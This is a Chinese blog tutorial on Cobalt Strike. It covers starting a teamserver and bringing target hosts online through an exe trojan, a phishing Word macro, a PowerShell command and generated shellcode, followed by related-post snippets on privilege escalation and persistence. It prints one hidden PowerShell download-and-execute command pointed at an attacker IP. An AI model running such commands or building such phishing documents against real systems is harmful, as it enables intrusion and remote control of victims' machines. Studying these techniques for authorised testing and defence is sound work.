Cobalt Strike四种提权方法

最新推荐文章于 2024-07-06 23:10:19 发布
最新推荐文章于 2024-07-06 23:10:19 发布
阅读量1.4k 收藏 20
点赞数 33
文章标签: Cobalt Strike 后渗透 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60870041/article/details/134969796
版权

简介

Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。

Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等

客户端功能点

在这里插入图片描述

1.新建连接
2.断开当前连接
3.监听器
4.改变视图为Pivot Graph(视图列表)
5.改变视图为Session Table(会话列表)
6.改变视图为Target Table(目标列表)
7.显示所有以获取的受害主机的凭证
8.查看已下载文件
9.查看键盘记录结果
10.查看屏幕截图
11.生成无状态的可执行exe木马
12.使用java自签名的程序进行钓鱼攻击
13.生成office宏病毒文件
14.为payload提供web服务以便下载和执行
15.提供文件下载,可以选择Mime类型
16.管理Cobalt Strike上运行的web服务
17.帮助
18.关于

环境搭建

  1. 将下载好的cs工具内的server文件夹放进Linux虚拟机中运行
    赋权—>运行teamserver启动服务
    在这里插入图片描述

  2. 根据提示将服务启动

    ./teamserver 11.11.1.128 123 
<选择启动服务的ip> <设置密码> [使用的端口,默认50050] [木马失效时间]

    在这里插入图片描述

  3. 成功启动服务
    在这里插入图片描述

  4. 使用cs登录
    在这里插入图片描述

  5. 弹出验证指纹信息,用来判断中间是否被劫持。和服务器启动时的指纹信息一样
    在这里插入图片描述

    在这里插入图片描述

  6. 开启监听
    在这里插入图片描述

exe提权

  1. 制作木马,选择监听地址
    在这里插入图片描述
    在这里插入图片描述
  2. 桌面生成木马文件
    在这里插入图片描述
  3. 运行exe木马,cs成功上线
    在这里插入图片描述

使用Microsoft制作钓鱼文档

  1. 这次用
    在这里插入图片描述
  2. 使用后生成一个宏代码,上面写的就是制作步骤
    在这里插入图片描述
  3. 将代码复制下来,新建一个word文档,选择宏
    在这里插入图片描述
  4. 将复制下来的代码粘贴进去,保存
    在这里插入图片描述
  5. 操作完成后关闭文档,下次再双击进入的时候就会自动上线到cs

power shell

  1. 该方法十分简单,但条件苛刻,需要目标能连接到服务器(kali)

  2. 点击这个生成一串命令,类似反弹shell
    在这里插入图片描述
    设置监听
    在这里插入图片描述
    在这里插入图片描述

  3. 将这串代码复制,win+R打开运行框,将代码粘进去回车,cs上线成功

    powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.9.47.141:80/a'))"

    这串代码会在服务器生成payload,目标访问自动下载payload

    这就是生成的payload
    在这里插入图片描述

shellcode

  1. 选择攻击模块
    在这里插入图片描述

  2. 生成一个c语言文件
    在这里插入图片描述

    可以看到里面是一堆shellcode

    生成的shellcode需要借助加载器才能转换为可执行脚本
    在这里插入图片描述

config_星辰
关注
  • 33
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Cobalt Strike 提权
f_carey的博客
01-25 3442
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Cobalt Strike 提权1 利用 Cobalt Strike 提权模块提权2 Cobalt Strike 与 PowerShell 模块提权 1 利用 Cobalt Strike 提权模块提权 获取 beacon 会话 右键当前 beacon 会话选择 Access:Elevate 模块 .
CobaltStrike系列学习笔记——(二)提权
limb0的博客
12-07 5341
CobaltStrike系列学习笔记——(二)提权 实验环境 系统 IP地址 服务器 kali 192.168.134.130 靶机 win7 192.168.134.135 先来回顾上一节的内容 进入目录: root@kali:~# cd cobaltstrike3.14/ 启动服务器: root@kali:~/cobaltstrike3.14# ./teamserv...
Cobalt Strike权限提升
yyj1781572的博客
11-18 1214
Cobalt Strike权限提升
简单的Metasploit及cs提权
最新发布
m0_74326506的博客
07-06 1024
但是因为windows中存在服务控制管理器,当服务启动时,会跟服务控制管理器通信,服务控制管理器如果没收到通信,则会认为服务出现错误,终止进程,因为后门木马文件本质并不是服务,无法和服务控制管理器进行通信,所以要么直接上线不了,要么上线一会就下线。在windows中 MSI是微软的安装包格式,他会在后台运行.exe,并以system权限启动安装,如果制作一个MSI安装包绑定生成的后门木马,只要win7点击安装,则会以system上线msf,制作MSI安装包可以在网上找。
cobaltstrike之系统提权
good good study
06-25 7112
当使用CS获取到一个权限,但是获取的当前权限较低,如普通用户或者administrator权限,我们想提到最高权限如system。可以使用提权功能 右键被控主机——>Access——>Elevate 亲测Windows Server 2008R2、 Win7及以下系统可用。Win10不可用 此时只有两个可以提权的payload 我们选中svc-exe,点击Launch。然后就弹回来一个system权限的beacon 我们也可以自己加入一些提权脚本进去。在Github上有一个提权
我的渗透笔记之cobaltstrike提权以及维持权限
xf555er的博客
03-16 4658
一、cobaltstrike提权提权:简单来说就是将用户的操作权限提升至系统权限 操作: 下面这张图的权限为用户权限 点击提权后,选择提供的exp,过一会就会出现系统权限的shell 二、权限的维持: 权限维持:简单来说就是让我们可以更久的控制一台电脑 操作: 1、创建监听后,我们要创建一个后门,在这里我们利用脚本攻击演示一下。 2、设置开机后自动启动脚本后门,点击目标中执行be...
内网渗透神器CobaltStrike之权限提升(七)
xf555er的博客
08-21 894
UAC-DLL攻击模块允许攻击者从低权限的本地管理员账户获得更高的权限。这种攻击利用UAC的漏洞,将ArtifactKit生成的恶意DLL复制到需要特权的位置。 适用于Windows7和Windows8及更高版本的未修补版本
Cobalt Strike 4.5
09-21
Cobalt Strike是一款超级好用的渗透测试工具,拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等多种功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名...
Cobalt Strike
06-17
CobaltStrike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。 CS功能 Cobalt Strike可以使用 ...
CobaltStrike手册
06-21
- **后渗透模块**:提供了丰富的后渗透工具,如浏览器代理模块、端口转发、扫描、提权、SOCKS代理、令牌窃取等,帮助安全人员在获得初始访问权限后进一步深入探索目标网络。 #### 二、Cobalt Strike的安装与环境...
Cobalt_Strike.zip
05-09
Cobalt Strike是一款常用于后渗透的神器,这个工具以团队作为主体,共享信息,拥有多种协议上线方式,集成了端口转发,端口扫描,socket代理,提权,钓鱼等。除去自身功能外,Cobalt Strike还利用了Metasploit和...
Cobalt-Strike-Aggressor-Scripts:Cobalt Strike Aggressor 插件包
05-02
Cobalt-Strike-Aggressor-Scripts 长时间未更新,说声抱歉 本脚本借鉴了许多大佬的思路以及源码,由于较为仓促未能贴出每个的url,在此表示感谢! Usage: Update 20200422 加入Info-Collect信息收集模块 加入chrome密码获取 Update 20200317 加入spawn as wnf Update 20200226 加入navicat decrypt 修改程序解决了winscp抓明文漏掉最后一位的问题 Update 20191231 加入新的本地提权方式 Update 20191220 fix bug,修复插件冲突。 Update 20191219 mshta方式反弹shell支持.net4.0方式,更好的适配高版本机器 增加部分应用抓取密码功能(session上右键可看到相关菜单) Update 20191211 增加nbt
cobaltstrike-win
05-05
cobaltstrike3.12,windows下版本,Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS,最近这个工具大火,成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,...
155.网络安全渗透测试—[Cobalt Strike系列]—[权限提升/BypassUAC提权/MS14-058提权/PowerUp提权/MSF提权]
qwsn
03-28 948
一、权限提升 1、BypassUAC 提权 2、CVE-2014-4113(MS14-058)提权 3、powerup 提权:服务权限配置不当 4、MSF 利用服务权限配置不当模块提权 二、提权测试 1、实验环境 2、BypassUAC提权 2、MS14-058提权 3、powerup提权:服务配置不当
Cobalt Strike(八)权限提升
qq_56426046的博客
09-21 340
UAC 是微软在 Windows Vista 以后版本引入的一种安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。————————————————————————————————————————————不要熄灭你的灵感及想象,不要成为你楷模的奴隶。用bypassuac命令来从中间相关联系的本地管理员到高度相关联系的本地管理员。icacls 查看权限 F完全控制。2.使用ms14-058提权。3.powerup提权
Metasploit联动CobaltStrike渗透win11主机并提权
Locosomnus的博客
04-01 1790
算是一个学习记录吧,很菜,欢迎大佬的骂
Cobalt Strike第四篇添加提权脚本
千寻的博客
02-16 1256
扩充payload
CobaltStrike使用-第五篇(Bypass UAC、CVE提权、Powerup提权
Love&Share
12-05 5044
前四篇文章介绍了CS的基本使用方法和模块,以及钓鱼攻击的方法,本篇将会介绍使用CS进行提权操作 文章目录权限提升Bypass UACCVE提权PowerUp凭证和哈希获取Beacon 中的 Mimikatz 权限提升 在主机上线后,当某些操作需要管理员权限,而当前用户权限只有一般用户权限时,就需要提权操作了 自 Windows vista 开始,Windows 系统引进了用户账户控制机制,即 UACUser Account Control机制,UAC 机制在 Win 7中得到了完善。UAC 与 UNIX .
cobalt strike提权
07-28
Cobalt Strike是一款常用于渗透测试和红队行动的工具,它提供了多种功能,包括创建后门、执行命令、横向移动等。在Cobalt Strike中,提权是指获取更高权限的访问级别,以便在目标系统上执行需要高权限才能完成的任务。 要在Cobalt Strike中进行提权,可以尝试以下几种方法: 1. 使用已知的漏洞:在目标系统上使用已知的漏洞来获取提权权限。这可能涉及到利用操作系统或应用程序的漏洞,以获取对系统的更高权限。 2. 寻找凭据:通过查找目标系统上存储的凭据,如敏感文件、配置文件、内存中的密码等,来获取更高权限的访问。 3. 利用弱密码:尝试使用常见的弱密码或默认凭据来登录目标系统,并获取更高权限。 4. 横向移动:如果已经获得了对一个低权限系统的访问权限,可以尝试使用该系统的凭据或漏洞来横向移动到其他系统,并获取更高权限。 需要注意的是,使用Cobalt Strike进行提权是为了测试和评估系统的安全性,在未经授权的情况下使用这些技术可能是非法的。在进行渗透测试或红队行动时,请确保遵守法律法规并获得合法的授权。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值